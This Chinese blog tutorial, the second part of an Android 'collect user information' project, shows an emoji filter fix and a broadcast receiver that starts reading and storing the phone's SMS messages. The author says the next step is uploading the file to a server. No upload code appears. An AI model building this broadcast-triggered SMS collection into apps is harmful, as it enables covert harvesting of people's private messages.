安卓项目实战----收集用户信息(二)

前言

在安卓项目实战—-收集用户信息(一)中,已经实现了短信的读取并写入到文件的操作,这篇文章在此基础上增加广播短信操作的管理模块。
PS:临近考试,所以很久没有更新…bla bla bla…

遗留的BUG

在之前的短信操作类中,表面看没什么问题,在模拟器中完美运行,但是当把它放到真机测试时,就出现了写入文件失败,如图。
image
经过查阅,发现是真机短信包含emoji表情导致的错误,emoji表情采用的是Unicode编码,在utf-8的xml解析中就会出现乱码(然而,笔者尝试将xml序列化的编码设置为Unicode并没有什么用,依旧报错)那么该如何解决这个问题呢?
经过不断百度、谷歌,终于在code.google.com问题页发现错误原因:谷歌的XmlSerializer忽略utf-16编码情况(笔者也没读懂到底是什么意思),总之是XmlSerializer不够完善,所以呢,有位大神重写了XmlSerializer,能够解决问题,不过这比较麻烦,所以我选择了其它方法————直接过滤掉emoji表情不就好了。

解决方法

过滤字符串中的Emoji表情[转]
http://www.oschina.net/question/89964_105220

很容易可以找到过滤emoji表情的java代码,笔者选择的是开源中国上一篇博客的代码,此处仅展示片段代码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
/**
* 过滤emoji 或者 其他非文字类型的字符
* @param source
* @return
*/

public static String filterEmoji(String source) {

if (!containsEmoji(source)) {
return source;//如果不包含,直接返回
}
//到这里铁定包含
StringBuilder buf = null;

int len = source.length();

for (int i = 0; i < len; i++) {
char codePoint = source.charAt(i);

if (isEmojiCharacter(codePoint)) {
if (buf == null) {
buf = new StringBuilder(source.length());
}

buf.append(codePoint);
} else {
}
}

if (buf == null) {
return source;//如果没有找到 emoji表情,则返回源字符串
} else {
if (buf.length() == len) {//这里的意义在于尽可能少的toString,因为会重新生成字符串
buf = null;
return source;
} else {
return buf.toString();
}
}

}

只需要在代码SmsOpt.java中调用过滤emoji表情的方法即可:

1
2
//            sms.setBody(cursor.getString(3));
sms.setBody(EmojiFilter.filterEmoji(cursor.getString(3)));

完善bug

加了以上操作还是会有问题,大部分emoji能够过滤掉,但总是发现如果一段字符串只包含emoji或者非法字符,就不能过滤掉了,换句话说,存在不能过滤单个emoji的问题,笔者试了多种方法都没用,最后发现其实只要在方法中加上一句

1
source = " "+ source;       //return 的时候trim()一下即可

就可以完美解决。

管理服务类

管理服务类无非就是管理SmsOpt的启动关闭的类,它需要继承广播接收者,实现我们自己定义的Collector接口,代码简单易懂,就不做解释了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
/**
* 短信采集服务
* Created by wuhaojie on 2015/11/9.
*/

public class SmsColt extends BroadcastReceiver implements Collector {
private static final String TAG = "SmsColt";
private Context mContext = null;
/**
* 短信操作对象
*/

private SmsOpt mSmsOpt = null;

public SmsColt() {
}

public SmsColt(Context mContext) {
this.mContext = mContext;
}

@Override
public void begin() {
Log.i(TAG, "开始短信采集服务");
if (mSmsOpt == null) {
mSmsOpt = new SmsOpt(mContext);
}
if (!mSmsOpt.isRunning())
mSmsOpt.start();
}

/**
* 广播接受者
*
* @param context
* @param intent
*/

@Override
public void onReceive(Context context, Intent intent) {
Log.i(TAG, "onReceive()");
this.mContext = context;
begin();
}
}

不仅如此,还需要一个MainServvice,用来管理所有的下级管理类。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/**
* 管理服务类
* Created by wuhaojie on 2015/11/9.
*/

public class MainService {
private Context mContext = null;

public MainService(Context mContext) {
this.mContext = mContext;
}

public void startAllService() {
SmsColt smsColt = new SmsColt(mContext);
smsColt.begin();
}
}

至此,可以在主界面中添加Button,用于开启所有服务

1
2
3
4
5
<Button
android:id="@+id/btn_main_start"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:text="开启服务" />

至此,才算完成短信模块的全部内容,接下来就需要使用网络将文件发送到指定的服务器上去。